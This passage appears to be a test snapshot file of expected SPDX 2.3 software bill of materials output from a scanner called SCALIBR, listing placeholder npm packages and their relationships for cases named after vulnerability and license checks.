"NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/one_source_with_one_deprecated_package - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "deprecated-pkg", "SPDXID": "SPDXRef-Package-deprecated-pkg-", "versionInfo": "1.0.0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/deprecated-pkg@1.0.0" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-deprecated-pkg-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-deprecated-pkg-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "5.9.0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@5.9.0" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.2", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.2" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.2", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.2" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", 